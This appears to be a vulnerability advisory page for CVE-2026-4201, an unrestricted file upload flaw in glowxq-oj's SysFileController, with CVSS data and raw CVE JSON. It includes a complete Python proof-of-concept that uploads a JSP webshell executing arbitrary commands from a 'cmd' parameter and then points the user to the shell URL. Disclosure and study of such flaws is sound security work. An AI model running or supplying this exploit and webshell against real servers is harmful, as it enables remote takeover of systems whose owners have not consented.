Security Vulnerability Report
中文
CVE-2026-4201 CVSS 7.3 HIGH

CVE-2026-4201

Published: 2026-03-16 14:20:05
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A weakness has been identified in glowxq glowxq-oj up to 6f7c723090472057252040fd2bbbdaa1b5ed2393. This vulnerability affects the function Upload of the file business/business-system/src/main/java/com/glowxq/system/admin/controller/SysFileController.java. Executing a manipulation can lead to unrestricted upload. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

glowxq-oj <= 6f7c723090472057252040fd2bbbdaa1b5ed2393(所有版本均受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-4201 PoC - Unrestricted File Upload in glowxq-oj # Target: glowxq-oj SysFileController Upload Function def exploit(target_url, file_path): """ Exploit for CVE-2026-4201: Unrestricted File Upload This PoC demonstrates uploading a JSP webshell to the target server. """ # JSP Webshell payload webshell = '''<%@ page import="java.util.*,java.io.*"%><%if(request.getParameter("cmd")!=null){Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os=p.getOutputStream();InputStream in=p.getInputStream();DataInputStream dis=new DataInputStream(in);String disr=dis.readLine();while(disr!=null){out.println(disr);disr=dis.readLine();}}%>''' # Prepare multipart form data files = { 'file': ('shell.jsp', webshell.encode(), 'application/octet-stream') } # Upload endpoint (typically /system/file/upload or similar) upload_url = f"{target_url.rstrip('/')}/system/file/upload" try: print(f"[*] Target: {target_url}") print(f"[*] Uploading malicious JSP file...") # Send malicious upload request response = requests.post(upload_url, files=files, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") # If successful, try to access the uploaded shell if response.status_code == 200 and 'path' in response.text.lower(): # Extract uploaded file path from response import json try: resp_json = response.json() if 'data' in resp_json and 'url' in resp_json['data']: shell_url = resp_json['data']['url'] print(f"[+] Shell uploaded successfully!") print(f"[+] Access shell at: {shell_url}") print(f"[+] Execute command: {shell_url}?cmd=whoami") except: print("[+] File uploaded - check response for file path") else: print("[-] Upload failed or endpoint not vulnerable") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com") sys.exit(1) target = sys.argv[1] exploit(target, "shell.jsp")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4201", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:05.070", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in glowxq glowxq-oj up to 6f7c723090472057252040fd2bbbdaa1b5ed2393. This vulnerability affects the function Upload of the file business/business-system/src/main/java/com/glowxq/system/admin/controller/SysFileController.java. Executing a manipulation can lead to unrestricted upload. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha identificado una debilidad en glowxq glowxq-oj hasta 6f7c723090472057252040fd2bbbdaa1b5ed2393. Esta vulnerabilidad afecta a la función Upload del archivo business/business-system/src/main/java/com/glowxq/system/admin/controller/SysFileController.java. La ejecución de una manipulación puede llevar a una carga sin restricciones. El ataque puede ser lanzado remotamente. El exploit ha sido puesto a disposición del público y podría ser utilizado para ataques. Este producto no utiliza versionado. Por esta razón, la información sobre las versiones afectadas y no afectadas no está disponible. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://fx4tqqfvdw4.feishu.cn/docx/XM7MdiAtxodVIOx5HXScEdOsn47?from=from_copylink", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351113", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351113", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.770477", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.